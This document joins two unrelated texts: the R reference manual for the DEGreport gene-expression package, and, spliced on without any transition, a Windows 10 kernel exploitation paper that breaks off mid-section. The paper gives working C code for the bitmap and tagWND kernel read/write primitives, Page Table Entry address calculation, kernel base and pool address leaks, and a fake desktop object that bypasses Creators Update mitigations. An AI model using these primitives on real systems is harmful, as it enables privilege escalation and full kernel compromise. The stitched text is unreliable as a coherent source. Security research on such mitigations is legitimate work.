## S4 method for signature 'DESeqResults'
as.DEGSet(object, default = "shrunken", extras = NULL)
**Arguments**
- **resList**
List with results as elements containing log2FoldChange, pvalues and padj as columns. Rownames should be feature names. Elements should have names.
- **default**
The name of the element to use by default.
- **object**
Different objects to be transformed to DEGSet when using `as.DEGSet`.
- **...**
Optional parameters of the generic.
- **extras**
List of extra tables related to the same comparison when using `as.DEGSet`.
- **contrast**
To name the comparison when using `as.DEGSet`.
**Details**
For now supporting only `DESeq2::results()` output. Use constructor `degComps()` to create the object.
The list will contain one element for each comparison done. Each element has the following structure:
- **DEG table**
- Optional table with shrunk Fold Change when it has been done.
To access the raw table use `deg(dgs, "raw")`, to access the shrunken table use `deg(dgs, "shrunken")` or just `deg(dgs)`.
**Author(s)**
Lorena Pantano
**Examples**
```r
library(DESeq2)
library(edgeR)
library(limma)
dds <- makeExampleDESeqDataSet(betaSD = 1)
colData(dds)[["treatment"]]<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, combs = c("condition"))
deg(res)
deg(res, tidy = "tibble")
# From edgeR
dge <- DGEList(counts=counts(dds), group=colData(dds)[["treatment"]])
dge <- estimateCommonDisp(dge)
res <- as.DEGSet(topTags(exactTest(dge)))
# From limma
v <- voom(counts(dds), model.matrix(~treatment, colData(dds)), plot=FALSE)
fit <- lmFit(v)
fit <- eBayes(fit, robust=TRUE)
res <- as.DEGSet(topTable(fit, n = "Inf"), "A_vs_B")
```
degSignature
Plot gene signature for each group and signature
Description
Given a list of genes belonging to different classes (like markers), plot, for each group, the expression values of all the samples.
Usage
```r
degSignature(
counts,
signature,
group = NULL,
metadata = NULL,
slot = 1,
scale = FALSE
)
```
Arguments
- **counts**: expression data. It accepts bcbioRNASeq, DESeqDataSet and SummarizedExperiment objects. A data.frame or matrix is also supported, but it requires metadata in that case.
- **signature**: data.frame with two columns: a) genes that match row.names of counts, b) label to classify the gene inside a group. Normally, cell tissue name.
- **group**: character in metadata used to split data into different groups.
- **metadata**: data frame with sample information. Rownames should match the counts column names.
- **slot**: slotName in the case of SummarizedExperiment objects.
- **scale**: Whether to scale or not the expression.
Value
ggplot plot.
Examples
```r
data(humanGender)
data(geneInfo)
degSignature(humanGender, geneInfo, group = "group")
```
degSummary
Print Summary Statistics of Alpha Level Cutoffs
Description
Print Summary Statistics of Alpha Level Cutoffs
Usage
degSummary(
object,
alpha = c(0.1, 0.05, 0.01),
contrast = NULL,
caption = "",
kable = FALSE
)
Arguments
object Can be DEGSet or DESeqDataSet or DESeqResults.
alpha Numeric vector of desired alpha cutoffs.
contrast Character vector to use with results() function.
caption Character vector to add as caption to the table.
kable Whether to return a knitr::kable() output. Default is data.frame.
Value
data.frame or knitr::kable().
Author(s)
Lorena Pantano
References
• original idea of multiple alpha values and code syntax from Michael Steinbaugh.
Examples
library(DESeq2)
data(humanGender)
idx <- c(1:5, 75:80)
counts <- assays(humanGender)[[1]]
dse <- DESeqDataSetFromMatrix(counts[1:1000, idx],
colData(humanGender)[idx,],
design = ~group)
dse <- DESeq(dse)
res1 <- results(dse)
res2 <- degComps(dse, contrast = c("group_Male_vs_Female"))
degSummary(dse, contrast = "group_Male_vs_Female")
degSummary(res1)
degSummary(res1, kable = TRUE)
degSummary(res2[[1]])
---
degVar
**Distribution of p-values by standard deviation range**
**Description**
This function plots the p-value distribution colored by the quantiles of the standard deviation of the count data.
**Usage**
degVar(pvalues, counts)
**Arguments**
- `pvalues`: pvalues of DEG analysis
- `counts`: Matrix with counts for each sample and each gene. The number of rows should match the length of the pvalues vector.
**Value**
ggplot2 object
**Examples**
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degVar(res[, 4], counts(dds))
degVB
Description
Distribution of the standard deviation of DE genes compared to the background
Usage
degVB(tags, group, counts, pop = 400)
Arguments
tags List of genes that are DE.
group Character vector with group name for each sample, in the same order as the counts column names.
counts Matrix with counts for each sample and each gene.
pop Number of random samples taken for background comparison.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degVB(row.names(res)[1:20], colData(dds)["group"],
counts(dds, normalized = TRUE))
degVolcano
Description
Create volcano plot from log2FC and adjusted pvalues data frame
Usage
degVolcano(
stats,
side = "both",
title = "Volcano Plot with Marginal Distributions",
pval.cutoff = 0.05,
lfc.cutoff = 1,
shade.colour = "orange",
shade.alpha = 0.25,
point.colour = "gray",
point.alpha = 0.75,
point.outline.colour = "darkgray",
line.colour = "gray",
plot_text = NULL
)
Arguments
stats data.frame with two columns: logFC and Adjusted.Pvalue
side plot UP, DOWN or BOTH de-regulated points
title title for the figure
pval.cutoff cutoff for the adjusted pvalue. Default 0.05
lfc.cutoff cutoff for the log2FC. Default 1
shade.colour background color. Default orange.
shade.alpha transparency value. Default 0.25
point.colour colours for points. Default gray
point.alpha transparency for points. Default 0.75
point.outline.colour
Default darkgray
line.colour Default gray
plot_text data.frame with three columns: logFC, Pvalue, Gene name
Details
This function was mainly developed by @jnhutchinson.
Value
The function plots a volcano plot together with the densities of the fold changes and p-values on the top and right sides of the volcano plot.
Author(s)
Lorena Pantano, John Hutchinson
Examples
```r
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD = 1)
dds <- DESeq(dds)
stats <- results(dds)[,c("log2FoldChange", "padj")]
stats[["name"]]<- row.names(stats)
degVolcano(stats, plot_text = stats[1:10,])
```
geneInfo
- **data.frame with chromosome information for each gene**
Description
data.frame with chromosome information for each gene
Usage
data(geneInfo)
Format
data.frame
Author(s)
Lorena Pantano, 2014-08-14
Source
biomart
geom_cor
*Add correlation and p-value to a ggplot2 plot*
Description
`geom_cor` will add the correlation, method and p-value to the plot automatically guessing the position if nothing else specified. Family font, size and colour can be used to change the format.
Usage
```r
geom_cor(
mapping = NULL,
data = NULL,
method = "spearman",
xpos = NULL,
ypos = NULL,
inherit.aes = TRUE,
...)
```
Arguments
- **mapping**: Set of aesthetic mappings created by `aes()` or `aes_()`. If specified and `inherit.aes = TRUE` (the default), it is combined with the default mapping at the top level of the plot. You must supply `mapping` if there is no plot mapping.
- **data**: The data to be displayed in this layer. There are three options:
- If `NULL`, the default, the data is inherited from the plot data as specified in the call to `ggplot()`.
- A `data.frame`, or other object, will override the plot data. All objects will be fortified to produce a data frame. See `fortify()` for which variables will be created.
- A function will be called with a single argument, the plot data. The return value must be a `data.frame`, and will be used as the layer data.
- **method**: Method to calculate the correlation. Values are passed to `cor.test()` (Spearman, Pearson, Kendall).
- **xpos**: Locate text at that position on the x axis.
- **ypos**: Locate text at that position on the y axis.
- **inherit.aes**: If FALSE, overrides the default aesthetics, rather than combining with them. This is most useful for helper functions that define both data and aesthetics and shouldn’t inherit behaviour from the default plot specification, e.g. `borders()`.
- **...**: other arguments passed on to `layer()`. These are often aesthetics, used to set an aesthetic to a fixed value, like `color = "red"` or `size = 3`. They may also be parameters to the paired geom/stat.
Details
It was integrated after reading this tutorial to extend ggplot2 layers
See Also
`ggplot2::layer()`
Examples
data(humanGender)
library(SummarizedExperiment)
library(ggplot2)
ggplot(as.data.frame(assay(humanGender)[1:1000,]),
aes(x = NA20502, y = NA20504)) +
geom_point() +
ylim(0,1.1e5) +
geom_cor(method = "kendall", ypos = 1e5)
humanGender
DGEList object for DE genes between Male and Females
Description
DGEList object for DE genes between Male and Females
Usage
data(humanGender)
Format
DGEList
Author(s)
Lorena Pantano, 2017-08-37
Source
gEUvadis
significants
Method to get the significant genes
Description
Function to get the features that are significant according to some thresholds from a DEGSet, DESeq2::DESeqResults and edgeR::topTags.
Usage
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'DEGSet'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'DESeqResults'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'TopTags'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'list'
significants(
object,
padj = 0.05,
fc = 0,
direction = NULL,
full = FALSE,
newFDR = FALSE,
...
)
Arguments
object DEGSet
padj Cutoff for the FDR column.
fc Cutoff for the log2FC column.
direction Whether to take down/up/ignore. Valid arguments are down, up and NULL.
full Whether to return full table or not.
... Passed to deg. Default: value = NULL. Value can be 'raw', 'shrunken'.
newFDR Whether to recalculate the FDR or not. See https://support.bioconductor.org/p/104059/#104072. Only used when a list is given to the method.
Value
A dplyr::tbl_df data frame. The gene column has the feature name. In the case of using this method with the results from degComps, log2FoldChange has the highest fold change from the comparisons, and padj has the padj associated with the previous column. Then there are two columns for each comparison, one for the log2FoldChange and another for the padj.
Author(s)
Lorena Pantano
Examples
```r
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["treatment"]] <- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
res <- degComps(dds, contrast = list("treatment_B_vs_A",
c("condition", "A", "B")))
significants(res, full = TRUE)
# significants(res, full = TRUE, padj = 1) # all genes
```
Index
aes(), 36
aes_(), 36
as.DEGSet (DEGSet), 28
as.DEGSet, data.frame-method (DEGSet), 28
as.DEGSet, DESeqResults-method (DEGSet), 28
as.DEGSet, TopTags-method (DEGSet), 28
borders(), 36
cluster::diana(), 19, 20
ComplexHeatmap::Heatmap(), 8
ComplexHeatmap::HeatmapAnnotation(), 6
ConsensusClusterPlus, 19, 20
cor.test(), 36
createReport, 4
data.frame, 31
deg, 4, 38
deg,DEGSet-method (deg), 4
degCheckFactors, 5
degColors, 6
degComps, 7, 38
degComps(), 29
degCorCov, 8
degCorCov(), 10
degCorrect (degDefault), 11
degCorrect,DEGSet-method (degDefault), 11
degCovariates, 9
degDefault, 11
degDefault,DEGSet-method (degDefault), 11
degFilter, 12
degMA, 13
degMB, 14
degMDS, 15
degMean, 15, 26
degMerge, 16
degMV, 17, 26
degObj, 18
degPatterns, 16, 19
degPatterns(), 24
degPCA, 21
degPlot, 22
degPlotCluster, 24
degPlotWide, 25
degQC, 26
DEGreport (DEGreport-package), 3
DEGreport-package, 3
degResults, 27
DEGSet, 5, 8, 12, 13, 26, 28, 31, 37, 38
DEGSet-class (DEGSet), 28
degSignature, 30
degSummary, 31
degVar, 26, 32
degVB, 33
degVolcano, 33
DESeq2::DESeqDataSet, 7, 23, 26
DESeq2::DESeqDataSet(), 27
DESeq2::DESeqResults, 23, 37
DESeq2::estimateSizeFactorsForMatrix(), 6
DESeq2::lfcShrink(), 7
DESeq2::results(), 7, 27, 29
DESeq2::rlog(), 27
DESeqDataSet, 31
DESeqResults, 31
dplyr::tbl_df, 38
edgeR::topTags, 37
fortify(), 36
geneInfo, 35
geom_cor, 35
ggplot, 13
ggplot(), 36
ggplot2, 25, 35
ggplot2::layer(), 36
humanGender, 37
knitr::kable(), 31
layer(), 36
prcomp(), 22
results(), 31
significants, 37
significants, DEGSet-method (significants), 37
significants, DESeqResults-method (significants), 37
significants, list-method (significants), 37
significants, TopTags-method (significants), 37
TAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL – LEVERAGING WRITE-WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE
Morten Schenk msc@improsec.com
Contents
Abstract
Background and Windows Kernel Exploitation History
Kernel Read and Write Primitives
Windows 10 Mitigations
Windows 10 1607 Mitigations
Revival of Kernel Read and Write Primitives
Windows 10 1703 Mitigations
Revival of Kernel Read and Write Primitives Take 2
Kernel ASLR Bypass
Dynamic Function Location
Page Table Randomization
Executable Memory Allocation
Abstract
Microsoft has put significant effort into mitigating and increasing the difficulty in exploiting vulnerabilities in Windows 10, this also applies for kernel exploits and greatly raises the bar. Most kernel exploits today require a kernel-mode read and write primitive along with a KASLR bypass. Windows 10 Anniversary Update and Creators Update has mitigated and broken most known techniques.
As this paper shows it is possible, despite the numerous implemented changes and mitigations, to still make use of the bitmap and tagWND kernel-mode read and write primitives. Furthermore, KASLR bypasses are still possible due to design issues and function pointers in kernel-mode structures.
KASLR bypasses together with kernel-mode read primitives allow for de-randomization of the Page Table base address, which allows reuse of the Page Table Entry overwrite technique. Additionally, it is possible to hook kernel-mode function calls to perform kernel memory allocations of writable, readable and executable memory and to retrieve the kernel address of that memory. Using this method, overwriting Page Table Entries is not needed and any shellcode can be executed directly once it has been copied onto the newly allocated memory pages.
The overall conclusion is that despite the increased number of mitigations and changes it is still possible to take advantage of Write-What-Where vulnerabilities in Creators Update to gain kernel-mode execution.
Background and Windows Kernel Exploitation History
Kernel Exploitation has been on the rise in recent years, this is most likely a response to the increased security in popular user-mode applications like Internet Explorer, Google Chrome and Adobe Reader. Most of these major applications have implemented sandboxing technologies which must be escaped to gain control of the compromised endpoint.
While sandboxing techniques are not as powerful on Windows 7, kernel exploits have an interest nonetheless, since they allow for privilege escalation. Leveraging kernel vulnerabilities on Windows 7 is considered rather simple, this is due to the lack of security mitigations and availability of kernel information.
It is possible to gain information on almost any kernel object using API’s built into Windows. These include NtQuerySystemInformation1 and EnumDeviceDrivers2 which will reveal kernel drivers base address as well as many kernel objects or pool memory locations3. Using NtQuerySystemInformation it is quite simple to reveal the base address of ntoskrnl.exe
Likewise, objects allocated on the big pool can also be found as described by Alex Ionescu4
While having the addresses of kernel drivers and objects is only a small part of kernel exploitation, it is important. Another crucial factor is storing the shellcode somewhere and getting kernel-mode execution of it. On Windows 7 the two easiest ways of storing the shellcode was to either allocate executable kernel memory with the shellcode in place or by using user memory but executing it from kernel-mode.
Allocating executable kernel memory with arbitrary content can on Windows 7 be done using CreatePipe and WriteFile5, since the content is stored on the NonPagedPool which is executable
---
3 https://recon.cx/2013/slides/Recon2013-Alex%20Ionescu-%20got%20problems%20but%20kernel%20ain%20t%20one.pdf
4 http://www.alex-ionescu.com/?p=231
5 http://www.alex-ionescu.com/?p=231
Gaining kernel-mode execution can be achieved by overwriting the bServerSideWindowProc bit of a kernel-mode Window object, which causes the associated WndProc function to be executed by a kernel thread instead of a user-mode thread. A different way is overwriting a function pointer in a virtual table; a very commonly used one is HalDispatchTable in ntoskrnl.exe.
Windows 8.1 introduced several hardening initiatives which increased the difficulty of kernel exploitation. To start with, kernel-leaking APIs like NtQuerySystemInformation are blocked if called from Low Integrity, which is the case when an application is running inside a sandbox. Windows 8.1 also made non-executable kernel memory widespread: NonPagedPool memory was generally replaced with NonPagedPoolNx memory. Finally, Windows 8.1 introduced Supervisor Mode Execution Prevention (SMEP), which blocks execution of code at user-mode addresses from a kernel-mode context.
These mitigations stop most exploitation techniques known from Windows 7; exploitation is still very much possible, but it requires new techniques. Windows 10 has the same mitigations in place, and the first two editions of Windows 10, versions 1507 and 1511, do not add any further mitigations.
Kernel Read and Write Primitives
To overcome the mitigations put in place in Windows 8.1 and Windows 10, the concept of memory read and write primitives known from user-mode browser exploits were adapted into kernel exploitation. Two kernel-mode read and write primitives are the most popular and mostly used. These are coined bitmap primitive and tagWND primitive.
The bitmap primitive makes use of the GDI object Bitmap, which in kernel-mode is called a Surface object. The principle is to perform allocations of these Surface objects using CreateBitmap such that two bitmap objects are placed next to each other. When this is the case, a Write-What-Where vulnerability may be used to modify the size of the first Surface object. The size of a Surface object is controlled by the sizlBitmap field at offset 0x38 of the object; it consists of the bitmap's dimensions, one DWORD each.
When the size of the bitmap has been increased it is possible to use the API’s SetBitmapBits and GetBitmapBits to modify the second Surface object\(^6\). The field modified is the pointer which controls where the bitmap content is stored. This allows both read and write capabilities at arbitrary kernel memory locations. The read and write functionality can be implemented as shown below:
```c
RtlFillMemory(payload, PAGE_SIZE - 0x2b, 0xcc);
RtlFillMemory(payload + PAGE_SIZE - 0x2b, 0x100, 0x41);
BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload));
res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL);
```
\(^6\) https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives
```c
VOID writeWord(DWORD64 addr, DWORD64 value)
{
    BYTE *input = new BYTE[0x8];
    for (int i = 0; i < 8; i++)
    {
        input[i] = (value >> 8 * i) & 0xFF;   // serialize the QWORD byte by byte
    }
    PDWORD64 pointer = (PDWORD64)overwriteData;
    pointer[0x10F] = addr;                    // pvScan0 of the second Surface object
    SetBitmapBits(overwriter, 0xe00, overwriteData);
    SetBitmapBits(hwrite, 0x8, input);        // writes the 8 bytes to addr
    return;
}

DWORD64 readWord(DWORD64 addr)
{
    DWORD64 value = 0;
    BYTE *res = new BYTE[0x8];
    PDWORD64 pointer = (PDWORD64)overwriteData;
    pointer[0x10F] = addr;                    // point the second bitmap at addr
    SetBitmapBits(overwriter, 0xe00, overwriteData);
    GetBitmapBits(hwrite, 0x8, res);          // reads the 8 bytes at addr
    for (int i = 0; i < 8; i++)
    {
        DWORD64 tmp = ((DWORD64)res[i]) << (8 * i);
        value += tmp;
    }
    SetBitmapBits(overwriter, 0xe00, overwriteData);
    return value;
}
```
To perform the overwrite using a Write-What-Where vulnerability requires knowledge of where the Surface object is in kernel-mode. Since this must also work from Low Integrity, APIs like NtQuerySystemInformation cannot be used. It is however possible to find the address of the Surface object through the GdiSharedHandleTable structure, which is held by the Process Environment Block. The GdiSharedHandleTable contains an entry for every GDI object, including Surface objects. Using the handle of the user-mode bitmap object it is possible to look up the correct entry in the table, where the kernel-mode address of the Surface object is given.
The second kernel-mode read and write primitive is the tagWND primitive. It uses a technique similar to the bitmap primitive, by allocating two Windows, which have corresponding kernel-mode objects called tagWND. These tagWND objects must also be located next to each other.
A tagWND object may contain a variable-size field called ExtraBytes; if the size of this field, called cbWndExtra, is overwritten, it becomes possible to modify the next tagWND object. Using the SetWindowLongPtr API it is then possible to modify arbitrary fields of the following tagWND object, specifically the strName field, which specifies the location of the title name of the Window. Using the user-mode APIs InternalGetWindowText and NtUserDefSetText it is possible to perform read and write operations at arbitrary kernel memory addresses\(^7\).
A write primitive may be implemented as shown below:
Just like with the bitmap read and write primitive, the location of the tagWND object must be known. This is possible using the UserHandleTable presented by the exportable structure called gSharedInfo located in User32.dll. It contains a list of all objects located in the Desktop Heap in kernel-mode, having the handle of the user-mode Window object allows a search through the UserHandleTable, which reveals the kernel-mode address of the associated tagWND object. An implementation is shown below:
```c
DWORD i = 0;
while (TRUE)
{
	kernelHandle = (HWND)(i | (UserHandleTable[i].wUniq << 0x10));
	if (kernelHandle == hwnd)
	{
		kernelAddr = (DWORD64)UserHandleTable[i].phead;
		break;
	}
	i++;
}
}
```
To overcome the issue of non-executable kernel memory a technique called Page Table Entry overwrite has become very common. The idea is to allocate shellcode at a user-mode address, resolve its corresponding Page Table Entry and overwrite it. The Page Table contains the metadata of all virtual memory, including bits indicating whether the memory page is executable or not and whether it is kernel memory or not.
Leveraging the kernel-mode write primitive against a Page Table Entry for an allocated page allows for modification of execution status and kernel-mode status. It is possible to turn user-mode memory into kernel-mode memory in regards to SMEP allowing for execution. The base address of the Page Tables is static on Windows 8.1 and Windows 10 1507 and 1511 and the address of the Page Table Entry may be found using the algorithm below:
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
	vaddr >>= 9;                  // 0x1000-byte pages, 8-byte PTEs
	vaddr &= 0x7FFFFFFFF8;
	vaddr += 0xFFFFF68000000000;  // static Page Table base before randomization
	return vaddr;
}
```
Performing an overwrite can also turn non-executable kernel memory into executable kernel memory.
Windows 10 Mitigations
Once executable kernel-mode memory has been created, gaining execution may be performed with the same methods as on Windows 7.
In many instances the base address of ntoskrnl.exe is needed. Previously this was found using NtQuerySystemInformation, but since that is no longer possible, a very effective alternative is the HAL Heap. It was in many cases allocated at a static address and contains a pointer into ntoskrnl.exe at offset 0x448. Using the kernel-mode read primitive to read the content at address 0xFFFFFFFFFFD00448 yields a pointer into ntoskrnl.exe, which may then be used to find the base address of the driver by searching backwards for the MZ header, as shown below
```c
DWORD64 getNtBaseAddr()
{
	DWORD64 baseAddr = 0;
	DWORD64 ntAddr = readQWORD(0xFFFFFFFFFFD00448);  // HAL Heap pointer into ntoskrnl.exe
	DWORD64 signature = 0x00905a4d;                  // "MZ" DOS header
	DWORD64 searchAddr = ntAddr & 0xFFFFFFFFFFFFF000;
	while (TRUE)
	{
		DWORD64 readData = readQWORD(searchAddr);
		DWORD64 tmp = readData & 0xFFFFFFFF;
		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;            // walk back one page at a time
	}
	return baseAddr;
}
```
This concludes the brief history of kernel exploitation from Windows 7 up to Windows 10 1511.
Windows 10 1607 Mitigations
Windows 10 Anniversary Update, which is also called Windows 10 1607 introduced additional mitigations against kernel exploitation. First, the base address of Page Tables is randomized on startup, making the simple translation of memory address to Page Table Entry impossible. This mitigates the creation of executable kernel-mode memory in many kernel exploits.
Next, the kernel-mode addresses of GDI objects in the GdiSharedHandleTable were removed. This means that it is no longer possible to use this method to locate the kernel-mode address of a Surface object, which in turn means that the size of a Surface object cannot be overwritten, breaking the bitmap kernel-mode read and write primitive.
Finally, the strName field of a tagWND object must contain a pointer inside the Desktop Heap when used through InternalGetWindowText and NtUserDefSetText. This limits its usage, since it can no longer be used to read and write at arbitrary kernel-mode addresses.
Revival of Kernel Read and Write Primitives
This section goes into the mitigations which break the kernel-mode read and write primitives. The first primitive to be examined is the bitmap primitive. The issue to be resolved is how to find the kernel-mode address of the Surface object. If the Surface object has a size of 0x1000 or larger it is in the Large Paged Pool. Furthermore, if the Surface object has a size of exactly 0x1000 the Surface objects will be allocated to individual memory pages.
Allocating many Surface objects of size 0x1000 will cause them to be allocated to consecutive memory pages. This makes sure that locating one Surface object will reveal several Surface objects, which is needed for the kernel-mode read and write primitive. The Large Paged Pool base address is randomized on startup, which requires a kernel address leak.
Inspecting the Win32ThreadInfo field of the TEB shows
```
kd> dt _TEB @$teb
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : (null)
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : (null)
   +0x058 ThreadLocalStoragePointer : 0x00000056'4c614058 Void
   +0x060 ProcessEnvironmentBlock : 0x00000056'4c613000 _PEB
   +0x068 LastErrorValue   : 0
   +0x06c CountOfOwnedCriticalSections : 0
   +0x070 CsrClientThread  : (null)
   +0x078 Win32ThreadInfo  : 0xffff905c'001ecb10 Void
```
It turns out this pointer is exactly the address leak we need, since the base address of the Large Paged Pool can be found from it by removing the lower bits. If very large Surface objects are created, they will be placed at a predictable offset from that base address.
Using the static offset 0x16300000 will turn the Win32ThreadInfo pointer into an information leak of the Surface object as shown below.
```c
DWORD64 leakPool()
{
DWORD64 teb = (DWORD64)NtCurrentTeb();
DWORD64 pointer = *(PDWORD64)(teb+0x78);
DWORD64 addr = pointer & 0xFFFFFFFF00000000;
addr += 0x16300000;
return addr;
}
```
Inspecting the memory address given by the leakPool function after allocating the large Surface objects shows:
```
kd> dq ffff905c'16300000
ffff905c'16300000 41414141'41414141 41414141'41414141
ffff905c'16300030 41414141'41414141 41414141'41414141
ffff905c'16300060 41414141'41414141 41414141'41414141
ffff905c'16300090 41414141'41414141 41414141'41414141
ffff905c'163000c0 41414141'41414141 41414141'41414141
```
While this does point into a Surface object, it is only the data content of the object. It turns out that it will almost always be the second Surface object, so that one is deleted and the freed memory is reallocated with Surface objects which take up exactly 0x1000 bytes each. This is done by allocating close to 10,000 new bitmaps, as seen below:
```c
DeleteObject(hbitmap[1]);

DWORD64 size2 = 0x1000 - 0x260;     // pixel data that fills the page next to the header
BYTE *pBits2 = new BYTE[size2];
memset(pBits2, 0x42, size2);
HBITMAP *hbitmap2 = new HBITMAP[0x10000];
for (DWORD i = 0; i < 0x2500; i++)
{
	hbitmap2[i] = CreateBitmap(0x368, 0x1, 1, 32, pBits2);
}
```
Inspecting the memory address given by the address leak will now reveal a Surface object as seen below:
By exploiting a Write-What-Where vulnerability the size of the Surface object can be modified, since the size is now at a predictable address.
The second issue is the mitigation of the tagWND kernel-mode read and write primitive. The strName pointer of tagWND can only point inside the Desktop Heap when it is used through InternalGetWindowText and NtUserDefSetText. This limitation is enforced by a new function called DesktopVerifyHeapPointer as seen below.
The strName pointer, which is in RDX, is compared with the base address of the Desktop Heap as well as the maximum address of the Desktop Heap. If either of these comparisons fails, a BugCheck occurs. While these checks cannot be avoided, the Desktop Heap addresses used in them come from a tagDESKTOP object. The pointer to the tagDESKTOP object is never validated and is taken from the tagWND object. The structure of the tagWND concerning the tagDESKTOP is seen below.
The tagDESKTOP object used in the comparison is taken from offset 0x18 of the tagWND object. When SetWindowLongPtr is used to modify the strName pointer, it is also possible to modify the tagDESKTOP pointer. This allows for creating a fake tagDESKTOP object as seen below.
```c
VOID setupFakeDesktop(DWORD64 wndAddr)
{
g_fakeDesktop = (PDWORD64)VirtualAlloc((LPVOID)0x20000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(g_fakeDesktop, 0x11, 0x1000);
	DWORD64 rpDeskuserAddr = wndAddr - g_ulClientDelta + 0x18;
g_rpDesk = *(PDWORD64)rpDeskuserAddr;
}
```
This allows the exploit to supply a fake Desktop Heap base and maximum address which is just below and above the pointer dereferenced by strName. This can be implemented as shown below.
```c
VOID writeDWORD(DWORD64 addr, DWORD64 value)
{
DWORD offset = addr & 0xf;
addr -= offset;
DWORD64 filler;
DWORD64 size = 0x8 + offset;
CHAR* input = new CHAR[size];
LARGE_UNICODE_STRING uStr;
if (offset != 0)
{
filler = readDWORD(addr);
}
for (DWORD i = 0; i < offset; i++)
{
input[i] = (filler >> (8 * i)) & 0xFF;
}
for (DWORD i = 0; i < 8; i++)
{
input[i + offset] = (value >> (8 * i)) & 0xFF;
}
	RtlInitLargeUnicodeString(&uStr, input, size);
g_fakeDesktop[0x1] = 0;
g_fakeDesktop[0x9] = addr - 0x100;
g_fakeDesktop[0x10] = 0x200;
SetWindowLongPtr(g_window1, 0x118, addr);
SetWindowLongPtr(g_window1, 0x9, 0x2000000000000020);
SetWindowLongPtr(g_window1, 0x58, (DWORD64)g_fakeDesktop);
	NtUserDefSetText(g_window2, &uStr);
SetWindowLongPtr(g_window1, 0x58, g_rpDesk);
SetWindowLongPtr(g_window1, 0x118, 0x2000000000000000);
SetWindowLongPtr(g_window1, 0x118, g_winStringAddr);
}
```
Using the modification discussed in this section allows the continued use of both the bitmap and the tagWND kernel-mode read and write primitives.
Windows 10 1703 Mitigations
Windows 10 Creators Update, or Windows 10 1703, introduced further mitigations against kernel exploitation. The first mitigation is directed against the tagWND kernel-mode read and write primitive, and it works in two ways. First, the UserHandleTable from the gSharedInfo structure in User32.dll was changed: the kernel-mode addresses of all objects in the Desktop Heap were removed, as seen below.
First the Windows 10 1607 UserHandleTable is shown
```c
kd> dq poi(user32!gSharedInfo+8)
000002c5'db0f0000  00000000'00000000 00000000'00000000
000002c5'db0f0010  00000000'00010000 ffff9bc2'80583040
000002c5'db0f0020  00000000'00000000 00000000'00010000
000002c5'db0f0030  ffff9bc2'800ea870 ffff9bc2'801047b0
000002c5'db0f0040  00000000'00014004 ffff9bc2'800e9b00
000002c5'db0f0050  ffff9bc2'800ea700 00000000'00010003
000002c5'db0f0060  ffff9bc2'80590820 ffff9bc2'801047b0
000002c5'db0f0070  00000000'00014001 ffff9bc2'800e9b00
```
Then for Windows 10 1703
```c
kd> dq poi(user32!gSharedInfo+8)
00000222'e31b0000  00000000'00000000 00000000'00000000
00000222'e31b0010  00000000'00000000 00000000'00000000
00000222'e31b0020  00000000'000202fa 00000000'00000000
00000222'e31b0030  00000000'00000000 00000000'00010000
00000222'e31b0040  00000000'00000000 00000000'00000000
00000222'e31b0050  00000000'00000000 00000000'00010003
00000222'e31b0060  00000000'00000000 00000000'0000002c
00000222'e31b0070  00000000'00000000 00000000'00010003
```
Like the removal of kernel-mode addresses from the GdiSharedHandleTable in Windows 10 1607, this removal of kernel-mode addresses from the UserHandleTable removes the possibility of locating the tagWND object. The second change is a modification of SetWindowLongPtr: any ExtraBytes written are no longer located in kernel mode. As shown below, the ExtraBytes pointer is taken at offset 0x180 from the beginning of the tagWND object.
```
sub esi, r8d
movsx rcx, esi
add rcx, [rdi+180h] ; RDI == tagWND
loc_1C0053BE:
mov rax, [rcx]
mov [rsp+98h+var_70], rax
mov [rcx], r14 ; RCX -- ExtraBytes
jmp loc_1C005387B
```
Inspecting the registers at the point of the write shows the value in R14 of 0xFFFFF78000000000 being written to the address in RCX, which is a user-mode address.
This clearly breaks the primitive since the strName field of the second tagWND can no longer be modified.
There are two additional changes in Creators Update. The first, a minor one, modifies the size of the Surface object header: it is increased by 8 bytes, which must be accounted for, or the allocation alignment fails. The second is the randomization of the HAL Heap, which means that a pointer into ntoskrnl.exe can no longer be found at the address 0xFFFFFFFFFFD00448.
Revival of Kernel Read and Write Primitives Take 2
With the changes in Windows 10 Creators Update, both kernel-mode read and write primitives break. However, the changes affecting the bitmap primitive are minimal and may be rectified in a matter of minutes by simply decreasing the size of each bitmap to ensure it still takes up exactly 0x1000 bytes. The changes affecting the tagWND kernel-mode read and write primitive are much more substantial.
The Win32ClientInfo structure from the TEB has also been modified, previously offset 0x28 of the structure was the ulClientDelta, which describes the delta between the user-mode mapping and the actual Desktop Heap. Now the contents are different:
```
kd> dq @$teb+800 L6
000000d6'fd73a800  00000000'00000000 00000000'00000000
000000d6'fd73a810  00000000'00000000 00000000'00000000
